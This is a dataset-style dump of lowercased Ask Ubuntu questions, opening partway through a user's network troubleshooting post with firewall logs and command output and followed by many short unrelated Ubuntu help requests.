[ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=13738 proto=2 [ 4703.062704 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4706.310170 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=15942 proto=2 [ 4828.062707 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4832.174324 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16505 proto=2 [ 4953.062628 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 4961.469282 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16090 proto=2 [ 5078.062552 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5080.776462 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=17239 proto=2 [ 5203.070394 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5205.358134 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=17665 proto=2 [ 5328.070401 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5330.651139 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=19090 proto=2 [ 5453.072279 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5457.085433 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16137 proto=2 [ 5578.074492 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5582.359006 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16150 proto=2 [ 5703.074410 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5705.070122 ] [ ufw block ] in=eth0 out= mac= [ blanked ] -- - src=192.168.0.10 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=16163 proto=2 [ 5828.074387 ] [ ufw block ] in=eth0 out= mac= [ blanked ] [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5835.319941 ] [ ufw block ] in=eth0 out= mac= [ blanked ] [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=23298 proto=2 [ 5953.074429 ] [ ufw block ] in=eth0 out= mac= [ blanked ] [ blanked ] -- - src=192.168.0.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5961.925481 ] [ ufw block ] in=eth0 out= mac= [ blanked ] [ blanked ] -- - src=192.168.0.5 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=24261 proto=2 doug @ ubuntu : /sam $ lspci -nnk |grep -ia2 eth 03:07.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8169 pci gigabit ethernet controller [ 10ec:8169 ] ( rev 10 ) subsystem : asustek computer inc. device [ 1043:11e5 ] kernel driver in use : r8169 doug @ ubuntu : /sam $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 doug @ ubuntu : /sam $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ ifupdown ( eth0 ) ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : r8169 state : connected default : yes hw address : [ blanked ] capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.7 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwl3945 state : disconnected default : no hw address : 00:19 : d2:72:5a:0c capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points att592 : infra , 30:60:23:76 : fe:60 , freq 2437 mhz , rate 54 mb/s , strength 24 wpa wpa2 doug @ ubuntu : /sam $ nslookup ubuntu.com ; ; connection timed out ; no servers could be reached doug @ ubuntu : /sam $ dig ubuntuforums.org ; < < > > dig 9.8.1-p1 < < > > ubuntuforums.org ; ; global options : +cmd ; ; connection timed out ; no servers could be reached doug @ ubuntu : /sam $ sudo ifconfig eth0 up doug @ ubuntu : /sam $ dhcpcd eth0 the program 'dhcpcd ' can be found in the following packages : * dhcpcd * dhcpcd5 try : sudo apt-get install < selected package > doug @ ubuntu : /sam $ lspci -k 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) subsystem : asustek computer inc. device 1297 kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) subsystem : asustek computer inc. device 1252 kernel driver in use : i915 kernel modules : intelfb , i915 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) subsystem : asustek computer inc. device 1252 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel modules : leds-ss4200 , itco_wdt , intel-rng 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel driver in use : ata_piix 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) subsystem : asustek computer inc. device 1297 kernel modules : i2c-i801 02:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) subsystem : intel corporation pro/wireless 3945abg network connection kernel driver in use : iwl3945 kernel modules : iwl3945 03:01.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b3 ) subsystem : asustek computer inc. device 1297 kernel driver in use : yenta_cardbus kernel modules : yenta_socket 03:01.1 firewire ( ieee 1394 ) : ricoh co ltd r5c552 ieee 1394 controller ( rev 08 ) subsystem : asustek computer inc. device 1297 kernel driver in use : firewire_ohci kernel modules : firewire-ohci 03:01.2 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 17 ) subsystem : asustek computer inc. device 1297 kernel driver in use : sdhci-pci kernel modules : sdhci-pci 03:01.3 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 08 ) subsystem : asustek computer inc. device 1297 kernel driver in use : r592 kernel modules : r592 03:07.0 ethernet controller : realtek semiconductor co. , ltd. rtl8169 pci gigabit ethernet controller ( rev 10 ) subsystem : asustek computer inc. device 11e5 kernel driver in use : r8169 kernel modules : r8169 doug @ ubuntu : /sam $ things i have tried : sudo start network-manager : no help gksudo gedit /etc/network/interfaces changed line to iface eth0 inet dhcp : no help gksudo gedit /etc/networkmanager/networkmanager.conf , i changed managed=false to managed=true . then sudo service network-manager restart : no help : network is unreachable sudo pkill -9 networkmanager : no help gksudo gedit /etc/resolve.conf added line nameseriver 8.8.8.8 : no help i know very little about networking ; to date this has simply worked . thanks for your help ! : - doug .
515218	how to enable rgb colored output in terminal ?	i 'm trying to print a colored string to a gnome-terminal using ansi escape codes , but , although it works for the custom colors , or even the 256 extra color , it does n't work with rgb codes . so , simplifying : cout < < `` \033 [ 33m '' < < ' . ' < < `` \033 [ 0m '' ; # prints with color cout < < `` \033 [ 38 ; 5 ; 135m '' < < ' . ' < < `` \033 [ 0m '' ; # prints with color cout < < `` \033 [ 38 ; 2 ; 0 ; 135 ; 0m '' < < ' . ' < < `` \033 [ 0m '' ; # does n't work , prints with default color how can i output something with an rgb color code in the gnome-terminal ? i 'm following this link for outputs : wikipedia ansi escape code . i added : $ export term=xterm-256color to my .bashrc file to support 256 colors and : $ tput colors outputs 256 , if that 's important .
515220	installation ubunto 14.01 on a different partition with windows 8.1	please assist me . i am eager to install ubunto 14.01 on a different partition but i do not know how to do it . i have hp with windows 7 pre-installed then i upgraded to windows 8.1 please show me how to make a dedicated partition to install ubuntu 14.01. please find the partition that i have . i appreciate your help on a i have : partition : /dev/sda1 ntfs label system 922.50 kb /dev/sda2 ntfs 199.00 mib flags : boot /dev/sda3 ntfs label receovery 488.77 gb /dev/sda4 unknown 16 gb unallocated 1 mib
515223	graphical disk surface check tool ?	i need a program that can scan my hard drive for read and write errors so i can partition around them . i really do n't do well with numbers but if i can have something that shows an output like the graphical display on gparted that would be perfect . i know a lot of people would recommend replacing the disk but right now i ca n't as i need this laptop for school and ca n't wait for a hard drive to arrive ( i have ordered one , yes , but i do n't expect it to arrive for another couple weeks as i only figured out afterwards they still have to manufacture it )
515224	failure to restore backup from deja dup	i had ubuntu 12.04.1 and i made a backup with deja dup of the home folder in an external hard disk . today i installed ubuntu 14.4 and erased the ubuntu 12.04.1 . now i 'm trying to restore my back up . first it ask where is the back up to restore , then it ask of what date to restore , and then it starts , after a wile ask for the password . i put the password and it says restoring and stays in preparing with out any advancement . do n't show any error , just stays preparing . the window of details is in white . i had all my documents ... it 's very bad for me , all my personal data ... lost ? thanks for any help , layla .
515225	ubuntu server restarting instead of shutting down	whenever i try to shutdown my pc by using sudo shutdown - ... now ( it does n't matter what i fill in for the ... ) , it always shutdowns down for about 3-4 seconds , and than just powers up again . i 'm sure wol is disabled , and just to be sure i tested it with ethernet cable unplugged . it 's a fresh install of ubuntu server 14.04 . it 's also a new pc so i do not have any prior experience with it . any help would be very much appreciated
515227	arduino not recongnized by ubuntu 14.04 lts	i installed ubuntu 14.04 on my acer netbook d255e , its currently running a crucial ssd 256g 500read 333write and a 2g ram card with the crappy intel atom processor . i 'm fairly new to ubuntu and i cant get the system to even acknowledge i plugged the arduino uno microcontroller connected to the usb port . can anyone offer a solution to this , i 've read up on a few how-tos online on my desktop but they 're all for older versions of ubuntu .
515230	partitioning and upgrading help	i am using ubuntu 12.04 . i wish to upgrade it to 14.04 . my current partitions are - i want to upgrade without wiping out my data . what should be the appropriate partitions ? i have a 14.04 iso image with me . edit - i am not getting the option to upgrade while booting via usb . other two options are to install in along side or erasing and installing a fresh 14.04 . is it anything i can do to upgrade , without erasing ? if no , please suggest me some partition examples so that i can partition my space right now and then erase only the required space .
515231	error compiling glib in ubuntu 14.04 ( trying to install gimpshop )	i 'm kinda new in linux , so please take it easy on the most complicated stuff . i 'm trying to install gimpshop . installation guide asks me to install glib first , and when i try to compile it using the make command i get errors . when i run the ./configure -- prefix=/usr command , i get this : checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for the beos ... no checking for win32 ... no checking whether to enable garbage collector friendliness ... no checking whether to disable memory pools ... no checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept ansi c ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking for c++ ... no checking for g++ ... no checking for gcc ... gcc checking whether we are using the gnu c++ compiler ... no checking whether gcc accepts -g ... no checking dependency style of gcc ... gcc3 checking for gcc option to accept ansi c ... none needed checking for a bsd-compatible install ... /usr/bin/install -c checking for special c compiler options needed for large files ... no checking for _file_offset_bits value needed for large files ... no checking for _large_files value needed for large files ... no checking for pkg-config ... /usr/bin/pkg-config checking for gawk ... ( cached ) mawk checking for perl5 ... no checking for perl ... perl checking for indent ... no checking for perl ... /usr/bin/perl checking for iconv_open ... yes checking how to run the c preprocessor ... gcc -e checking for egrep ... grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking locale.h usability ... yes checking locale.h presence ... yes checking for locale.h ... yes checking for lc_messages ... yes checking libintl.h usability ... yes checking libintl.h presence ... yes checking for libintl.h ... yes checking for ngettext in libc ... yes checking for dgettext in libc ... yes checking for bind_textdomain_codeset ... yes checking for msgfmt ... /usr/bin/msgfmt checking for dcgettext ... yes checking for gmsgfmt ... /usr/bin/msgfmt checking for xgettext ... /usr/bin/xgettext checking for catalogs to be installed ... am ar az be bg bn bs ca cs cy da de el en_ca en_gb eo es et eu fa fi fr ga gl gu he hi hr id is it ja ko lt lv mk mn ms nb ne nl nn no or pa pl pt pt_br ro ru sk sl sq sr sr @ ije sr @ latn sv ta tl tr uk vi wa xh yi zh_cn zh_tw checking for a sed that does not truncate output ... /bin/sed checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for /usr/bin/ld option to reload object files ... -r checking for bsd-compatible nm ... /usr/bin/nm -b checking whether ln -s works ... yes checking how to recognise dependent libraries ... pass_all checking dlfcn.h usability ... yes checking dlfcn.h presence ... yes checking for dlfcn.h ... yes checking for g77 ... no checking for f77 ... no checking for xlf ... no checking for frt ... no checking for pgf77 ... no checking for fort77 ... no checking for fl32 ... no checking for af77 ... no checking for f90 ... no checking for xlf90 ... no checking for pgf90 ... no checking for epcf90 ... no checking for f95 ... no checking for fort ... no checking for xlf95 ... no checking for ifc ... no checking for efc ... no checking for pgf95 ... no checking for lf95 ... no checking for gfortran ... no checking whether we are using the gnu fortran 77 compiler ... no checking whether accepts -g ... no checking the maximum length of command line arguments ... 32768 checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for objdir ... .libs checking for ar ... ar checking for ranlib ... ranlib checking for strip ... strip checking if gcc static flag works ... yes checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic checking if gcc pic flag -fpic works ... yes checking if gcc supports -c -o file.o ... yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no configure : creating libtool appending configuration tag `` cxx '' to libtool appending configuration tag `` f77 '' to libtool checking for extra flags to get ansi library prototypes ... none needed checking for extra flags for posix compliance ... none needed checking for ansi c header files ... ( cached ) yes checking for vprintf ... yes checking for _doprnt ... no checking for working alloca.h ... yes checking for alloca ... yes checking for atexit ... yes checking for on_exit ... yes checking for char ... yes checking size of char ... 1 checking for short ... yes checking size of short ... 2 checking for long ... yes checking size of long ... 8 checking for int ... yes checking size of int ... 4 checking for void * ... yes checking size of void * ... 8 checking for long long ... yes checking size of long long ... 8 checking for __int64 ... no checking size of __int64 ... 0 checking for format to printf and scanf a guint64 ... % llu checking for an ansi c-conforming const ... yes checking if malloc ( ) and friends prototypes are gmem.h compatible ... no checking for growing stack pointer ... yes checking for __inline ... yes checking for __inline__ ... yes checking for inline ... yes checking if inline functions in headers work ... yes checking for iso c99 varargs macros in c ... yes checking for iso c99 varargs macros in c++ ... no checking for gnuc varargs macros ... yes checking for gnuc visibility attribute ... yes checking whether byte ordering is bigendian ... no checking dirent.h usability ... yes checking dirent.h presence ... yes checking for dirent.h ... yes checking float.h usability ... yes checking float.h presence ... yes checking for float.h ... yes checking limits.h usability ... yes checking limits.h presence ... yes checking for limits.h ... yes checking pwd.h usability ... yes checking pwd.h presence ... yes checking for pwd.h ... yes checking sys/param.h usability ... yes checking sys/param.h presence ... yes checking for sys/param.h ... yes checking sys/poll.h usability ... yes checking sys/poll.h presence ... yes checking for sys/poll.h ... yes checking sys/select.h usability ... yes checking sys/select.h presence ... yes checking for sys/select.h ... yes checking for sys/types.h ... ( cached ) yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking sys/times.h usability ... yes checking sys/times.h presence ... yes checking for sys/times.h ... yes checking for unistd.h ... ( cached ) yes checking values.h usability ... yes checking values.h presence ... yes checking for values.h ... yes checking for stdint.h ... ( cached ) yes checking sched.h usability ... yes checking sched.h presence ... yes checking for sched.h ... yes checking langinfo.h usability ... yes checking langinfo.h presence ... yes checking for langinfo.h ... yes checking for nl_langinfo ... yes checking for nl_langinfo and codeset ... yes checking whether we are using the gnu c library 2.1 or newer ... yes checking stddef.h usability ... yes checking stddef.h presence ... yes checking for stddef.h ... yes checking for stdlib.h ... ( cached ) yes checking for string.h ... ( cached ) yes checking for setlocale ... yes checking for size_t ... yes checking size of size_t ... 8 checking for the appropriate definition for size_t ... unsigned long checking for lstat ... yes checking for strerror ... yes checking for strsignal ... yes checking for memmove ... yes checking for mkstemp ... yes checking for vsnprintf ... yes checking for stpcpy ... yes checking for strcasecmp ... yes checking for strncasecmp ... yes checking for poll ... yes checking for getcwd ... yes checking for nanosleep ... yes checking for vasprintf ... yes checking for setenv ... yes checking for unsetenv ... yes checking for getc_unlocked ... yes checking for readlink ... yes checking for symlink ... yes checking for c99 vsnprintf ... yes checking whether printf supports positional parameters ... yes checking for signed ... yes checking for long long ... ( cached ) yes checking for long double ... yes checking for wchar_t ... yes checking for wint_t ... yes checking for size_t ... ( cached ) yes checking for ptrdiff_t ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for snprintf ... yes checking for c99 snprintf ... yes checking for sys_errlist ... yes checking for sys_siglist ... yes checking for sys_siglist declaration ... yes checking for fd_set ... yes , found in sys/types.h checking whether realloc ( null , ) will work ... yes checking for nl_langinfo ( codeset ) ... yes checking for openbsd strlcpy/strlcat ... no checking for an implementation of va_copy ( ) ... yes checking for an implementation of __va_copy ( ) ... yes checking whether va_lists can be copied by value ... no checking for dlopen ... no checking for nslinkmodule ... no checking for dlopen in -ldl ... yes checking for dlsym in -ldl ... yes checking for rtld_global brokenness ... no checking for preceeding underscore in symbols ... no checking for dlerror ... yes checking for the suffix of shared libraries ... .so checking for gspawn implementation ... gspawn.lo checking for giochannel implementation ... giounix.lo checking for platform-dependent source ... checking whether to compile timeloop ... yes checking if building for some win32 platform ... no checking for thread implementation ... posix checking thread related cflags ... -pthread checking for sched_get_priority_min ... yes checking thread related libraries ... -pthread checking for localtime_r ... yes checking for posix getpwuid_r ... yes checking size of pthread_t ... 8 checking for pthread_attr_setstacksize ... yes checking for minimal/maximal thread priority ... sched_get_priority_min ( sched_other ) /sched_get_priority_max ( sched_other ) checking for pthread_setschedparam ... yes checking for posix yield function ... sched_yield checking size of pthread_mutex_t ... 40 checking byte contents of pthread_mutex_initializer ... 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 checking whether to use assembler code for atomic operations ... x86_64 checking value of pollin ... 1 checking value of pollout ... 4 checking value of pollpri ... 2 checking value of pollerr ... 8 checking value of pollhup ... 16 checking value of pollnval ... 32 checking for eilseq ... yes configure : creating ./config.status config.status : creating glib-2.0.pc config.status : creating glib-2.0-uninstalled.pc config.status : creating gmodule-2.0.pc config.status : creating gmodule-no-export-2.0.pc config.status : creating gmodule-2.0-uninstalled.pc config.status : creating gthread-2.0.pc config.status : creating gthread-2.0-uninstalled.pc config.status : creating gobject-2.0.pc config.status : creating gobject-2.0-uninstalled.pc config.status : creating glib-zip config.status : creating glib-gettextize config.status : creating makefile config.status : creating build/makefile config.status : creating build/win32/makefile config.status : creating build/win32/dirent/makefile config.status : creating glib/makefile config.status : creating glib/libcharset/makefile config.status : creating glib/gnulib/makefile config.status : creating gmodule/makefile config.status : creating gmodule/gmoduleconf.h config.status : creating gobject/makefile config.status : creating gobject/glib-mkenums config.status : creating gthread/makefile config.status : creating po/makefile.in config.status : creating docs/makefile config.status : creating docs/reference/makefile config.status : creating docs/reference/glib/makefile config.status : creating docs/reference/glib/version.xml config.status : creating docs/reference/gobject/makefile config.status : creating docs/reference/gobject/version.xml config.status : creating tests/makefile config.status : creating tests/gobject/makefile config.status : creating m4macros/makefile config.status : creating config.h config.status : config.h is unchanged config.status : executing depfiles commands config.status : executing default-1 commands config.status : executing glibconfig.h commands config.status : glibconfig.h is unchanged config.status : executing chmod-scripts commands nsalvarrey @ delleuze : ~/glib-2.6.3 $ ^c nsalvarrey @ delleuze : ~/glib-2.6.3 $ and then , with the make command , i get this : galias.h:83:39 : error : 'g_ascii_digit_value ' aliased to undefined symbol 'ia__g_ascii_digit_value' extern __typeof ( g_ascii_digit_value ) g_ascii_digit_value __attribute ( ( alias ( `` ia__g_ascii_digit_value '' ) , visibility ( `` default '' ) ) ) ; ^ in file included from garray.c:35:0 : galias.h:31:35 : error : 'g_allocator_new ' aliased to undefined symbol 'ia__g_allocator_new' extern __typeof ( g_allocator_new ) g_allocator_new __attribute ( ( alias ( `` ia__g_allocator_new '' ) , visibility ( `` default '' ) ) ) ; ^ make [ 4 ] : *** [ garray.lo ] error 1 make [ 4 ] : se sale del directorio «/home/nsalvarrey/glib-2.6.3/glib» make [ 3 ] : *** [ all-recursive ] error 1 make [ 3 ] : se sale del directorio «/home/nsalvarrey/glib-2.6.3/glib» make [ 2 ] : *** [ all ] error 2 make [ 2 ] : se sale del directorio «/home/nsalvarrey/glib-2.6.3/glib» make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : se sale del directorio «/home/nsalvarrey/glib-2.6.3» make : *** [ all ] error 2 nsalvarrey @ delleuze : ~/glib-2.6.3 $ ( it 's actually a lot longer ) can somebody help me ?
515232	installation problem on dell laptop vostro 1000	trying both the dvd and usb versions of ubuntu 14.04 . laptop has 2g mem , 100g disk , amd athlon x2 64-bit chip , running xp . at the beginning of the install the screen presents a multi-colored vertical stripped pattern on the screen which i can not escape and therefore ca n't interact with the system install .
515238	bootable usb stick not boots	i have problem . my bootable usb stick not boots any linux distribution.. it just stop at bios , like before turning on os , but it does nothing . windows xp/7/8.1 installs boots perfectly . it stopped booting every linux dist . after windows 8.1 installation . later i deleted windows 8.1 and installed windows 7 , and now i want to install ubuntu from usb , but i cant ( from disk every linuxos boots perfectly but not from usb ) my computer now is like ~7years old . specs : cpu : amd athlon 64 x2 5000+ motherboard : gigabyte ga-m56s-s3 video card : nvidia n210 edit : it boots on my other laptop..its bootable , but from this.. nope , only windows installs
515239	another user 's home folder deleted while using adduser ?	i added a user as root via useradd user_1 and then set their password via passwd user_1 their home folder was at /home/user_1 and was full of stuff . i then added another user as root via 'adduser ' and their home folder was at /home/user_2 but it seems that /home/user_1 was cleared after i ran this command ? is there something i did wrong in this process , or is there nothing that is standing out here ? just very confused right now . if there 's nothing in the above that stands out i 'll just assume i messed up in another way and hope i do n't do it again . relevant commands : 129 adduser user2 130 cd /home/user2 131 su user2 132 ls /home/user1 133 su user1 134 ls /home/user1
515241	find : paths must precede expression:	i found the following line here : find * -maxdepth 0 -type d -exec tar czvf { } .tar.gz { } \ ; \ ; it is meant to tar gzip each folder in the current directory individually . but running it returns the error : find : paths must precede expression : there are a few posts on this error , but they do n't relate to the syntax used here . does anyone know what is causing this error ?
515243	ca n't download anything from ubuntu software center , 11.10	so i have tried many , many things now . i got a new laptop with ubuntu 11.10 on it , and i have always been a windows user . i have read most of the threads that were posted here and on other forums i tried everything i could , but it is still not working . it always says that i should check my internet connection , or something with repository . i even had to restore my laptop 2 times already , because i screwed up something and then would n't boot up again . i tried to change things in the software source , in the terminal and god knows where else , but nothing worked . i have a good internet connection wifi , i tried it with an ethernet cable aswell , still nothing . so if someone 's got any ideas , i would be very greatful .
515244	virtualbox breaks unity launcher , terminal shortcut disabled , tty mode login incorrect	after i installed virtualbox my computer went to a crawl and unity was tripping on itself . nothing worked in the menu bar so i couldnt shut down and had to manually restart the machine . now every time i start up the machine unity launcher and the menu bar are missing , and when i click on a folder on the desktop a window pops up to view the files and folders inside but you cant click on anything and there is no bar to close or minimize . i got into tty mode but it says my login is incorrect , but i am putting in my normal username and password , and i have tried capital and lowercase . i am extremely confused and a noob to linux and ubuntu . also , i cant launch terminal with the normal ctrl alt t shortcut . i really appreciate any help , thanks !
515247	14.04 microphone noice buzzing sounds	my microphone started acting up badly this morning has a loud buzz , it has got to be software it was working fine last night installed updates and shutdown last night and boom here we are , oh and i have a microphone jack microphone and a internal mic , both are acting up ... please help please help i need to use skype . dafull97
515250	ubuntu 14.01 server + postgresql install + configuration	this might be a simple or complicated question , but i recently installed open-xchange using the guide here http : //oxpedia.org/wiki/index.php ? title=appsuite : open-xchange_installation_guide_for_debian_7.0 but the default database is mysql . how can i a ) either reinstall to configure with postgresql or configure the current install to use postgresql instead of mysql ? any suggestions , links or tutorials ? thank you in advance . regards
515251	shortcut ctrl+q or ctrl+shift+q to quit apps	i 'm new for ubuntu , and i 'm just confused about some shortcuts . in mac os , cmd + q is available for any apps to quit . however ubuntu 14.04 does n't seems to have this shortcut in system wide . ( in google chrome , i need to press ctr+shift+q , on the other hand ctr+q for sublime text . ) so i want to make ctrl+q available to quit apps in system wild .
515253	can not upgrade from 13.10 to 14.04 with update manager	i installed 13.10 a while ago . i have been trying to install 14.04 from the update manager . i have checked and double checked the settings and no luck . it does not see the new version . is there a way to manually upgrade to 14.04 ? if i use a cd to install will it recognize my 13.10 and upgrade instead of install ?
515255	how and when is old-releases.ubuntu.com updated ?	the old-releases.ubuntu.com mirror hosts the repositories for eol ubuntu releases . the main page currently lists up to 11.10 ( or 12.04.3 if you count point upgrades ) , but the dists page lists up to 13.04 . why the discrepancy ? when will the main page be updated ? when will the newest eol release ( 13.10 ) be shifted here ?
515256	no gui before login on ubuntu 14.04	after i installed ubuntu 14.04 as the only os on my computer on nomodeset to install the nvidia drivers for my video card . i installed it and all is working properly . the only problem that i have is that when i turn on my compurter i only see command lines instead of the ubuntu logo . after that the login screen works in a proper way even with the gui . i only want to get the ubuntu logo instead of the command lines . ps : when i turn off my computer , the same thing is repeated .
515257	ubuntu for lenovo tablets ?	can i install ubuntu on a lenovo a7 3500 ? if it could n't be , which tablet would any one advice me to get for ubuntu ?
515258	how to customize or replace ubuntu grub like opensuse 's grub ?	i want to customize my grub like opensuse like this , it have distro icon , have not wide highlight selection , etc i have been using grub customizer but still can not produce like opensuse 's have . how to customize/replace ubuntu grub like opensuse 's grub ?
